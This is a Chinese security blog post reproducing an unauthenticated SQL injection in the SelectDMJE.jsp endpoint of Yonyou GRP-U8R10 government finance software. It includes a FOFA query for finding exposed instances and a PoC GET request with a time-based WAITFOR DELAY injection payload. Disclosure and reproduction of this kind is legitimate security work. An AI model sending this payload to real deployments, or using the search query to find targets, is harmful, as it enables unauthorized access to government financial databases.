用友GRP-U8 SelectDMJE.jsp SQL注入漏洞复现

已于 2024-01-18 03:01:59 修改
阅读量523 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-01-18 02:53:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135663900
版权

0x01 产品简介

用友GRP-U8R10行政事业内控管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。

0x02 漏洞概述

用友GRP-U8R10行政事业内控管理软件 SelectDMJE.jsp接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。

0x03 影响范围

用友GRP-U8R10产品官方在售及提供服务的版本为U8Manager,产品分B、C、G三个产品系列,以上受到本次通报漏洞的影响。

0x04 复现环境

FOFA:app="用友-GRP-U8"

38259206d4194f7299ad47142749d1e6.png

0x05 漏洞复现

PoC

GET /u8qx/SelectDMJE.jsp?kjnd=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Connection: close
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
用友GRP-U8 sqcxIndex.jsp SQL注入致RCE漏洞复现(XVE-2024-12560)
0xSec
05-27 514
用友GRP-U8R10行政事业内控管理软件sqcxIndex.jsp 接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
用友GRP-U8存在SQL注入漏洞复现
2301_80115097的博客
10-26 413
fofa:app=”用友-GRP-U8用友GRP-U8存在SQL注入漏洞文件名为bx_historyDataCheck.jsp
用友GRP-U8 SQL注入漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
09-26 1668
用友GRP-U8 SQL注入漏洞复现
漏洞复现用友GRP-U8 SelectDMJE.jsp SQL注入漏洞
m0_64366018的博客
01-25 590
【代码】【漏洞复现用友GRP-U8 SelectDMJE.jsp SQL注入漏洞
用友GRP-U8 SelectDMJE.jsp存在SQL注入漏洞
qq_39573664的博客
01-24 569
用友GRP-U8R10行政事业内控管理软件在SelectDMJE.jsp接口存在潜在的SQL注入漏洞,未经授权的攻击者有可能利用这个漏洞获取对数据库的权限。进一步的攻击可能导致攻击者获取服务器权限,带来严重的安全风险。
用友GRP-U8 sqcxIndex.jsp SQL注入漏洞(XVE-2024-12560)
wan___she__pi的博客
05-28 246
用友GRP-U8用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是行政事业财务领域最专业的政府财务管理软件。
用友GRP-U8 license_check.jsp SQL注入漏洞复现
0xSec
01-06 885
用友GRP-U8R10行政事业内控管理软件license_check.jsp接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
用友GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞
qq_36334672的博客
01-25 349
用友GRP-U8R10 U8Manager B、C、G 系列产品 < 20230905。
GRP-U8行政事业内控管理软件V11.21安装教程
05-28
用友软件作为国内知名的ERP解决方案提供商,其开发的GRP-U8行政事业内控管理软件是一款专为政府机关、事业单位打造的信息化管理工具。该软件集成了财务管理、预算控制、采购管理、人力资源等多个模块,助力提升机构...
用友GRP-U8R10政务管理软件AO数据采集方法.pdf
11-04
用友GRP-U8R10政务管理软件AO数据采集方法 本文将介绍如何使用用友GRP-U8R10政务管理软件实现AO数据采集的方法。该方法适用于审计过程中遇到的财务软件升级问题,即从用友GRP-R9 V9.7升级到用友GRP-U8R10,导致AO...
用友政务GRP-U8,近期常见问题85例解决方法
03-26
1.查询科目明细账会出现很多重复记录,2.查询明细账未按照凭证号排序3.自定义凭证打印,不打印上级科目名称:13.打开凭证箱慢15.期初余额装入中导入Excel文件报错,17.以前是双凭证模式,怎么调整为单凭证模式等等85...
用友Grp-U8明细账打印补丁publish.rar
10-09
本软件针对GRP-U8v10.5政务软件(政府会计制度)开发的明细账一次性打印补丁。 开发环境:SQL2008R2(低版本数据尽量能升级后再使用本补丁)。 Grp-U8(B/C/G)补丁2019-12-31. 安装手册:本补丁为绿色版,注册...
用友GRP-U8财务管理软件国标数据接口输出操作方法资料.pdf
02-14
"用友GRP-U8财务管理软件国标数据接口输出操作方法资料" 用友GRP-U8财务管理软件是政府行政事业单位财务人员专用的财务管理软件。该软件通过了GB/T 24589认证,并严格遵循公司研发质量管理标准,执行GB/T 24589-...
Lianwei 安全周报|2024.07.22
联蔚盘云的博客
07-22 763
新的一周又开始了,以下是本周「Lianwei周报」,我们总结推荐了本周的政策/标准/指南最新动态、热点资讯和安全事件,保证大家不错过本周的每一个重点!
轨道式智能巡检机器人,助力综合管廊安全运维
配电房综合监控
07-25 578
管廊巡检往往处于昏暗、潮湿、幽闭且狭长的空间环境,巡检过程中容易遇到有毒有害气体、泄露的燃气和强电等危险,同时不可避免会对巡检人员的心理构成一定负面影响。)实时性:地下管廊短则几公里、长则数十公里,其内部空间结构复杂,具有设备多、定位难的特点。综合管廊内部环境复杂而恶劣,给水、排水、热力、燃气、电力、电信等管道排布其中,空间狭窄、昏暗、潮湿,甚至会出现有毒害气体泄漏的环境。)环境检测功能:基于各类环境传感器,对于廊体内温湿度、有害气体含量、空气含氧量、烟雾浓度、光照度、井盖等状态进行检测。
保障企业数据主权:安全可控的爬虫工具与管理平台
最新发布
zhou6343178的博客
07-25 446
在数据驱动的时代,企业对数据的需求日益增长,但如何在保障数据主权的前提下高效采集数据?本文深入探讨了选择安全可控爬虫工具与管理平台的重要性,分析了关键特性,并提出实用建议,助力企业维护数据安全,实现数据价值最大化。
数据库安全:MySQL安全配置,MySQL安全基线检查加固
wangyuxiang946的博客
07-23 1914
MySQL基线检查,基线配置,安全加固
后台管理系统登录安全和权限要求
JAVA领域优质创作者,基于分片网络查询方法专利发明者。
07-25 567
启用MFA后,系统将要求输入用户名和密码(第一安全要素),再进行输入来自其 MFA设备的动态验证码(第二安全要素),双因子的安全认证将为您的账户提供更高的安全保护。传统的用户名和密码认证容易受到破解、盗取或暴力破解等攻击方式的威胁,而双因子认证可以提供额外的安全层次,确保只有授权用户才能访问账户或系统。通过采用双因子认证,企业可以增加用户账号的安全性,降低身份盗窃和欺诈行为的风险,提高用户对系统的信任度。这在网络安全是极不安全的。订单管理:用于管理订单信息,包括查看订单、修改订单状态、发货、退货、退款等。
用友GRP-U8高校内控管理软件 漏洞
07-28
- *2* *3* [用友 GRP-U8 Proxy XXE-SQL注入漏洞](https://blog.csdn.net/weixin_46944519/article/details/127225867)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值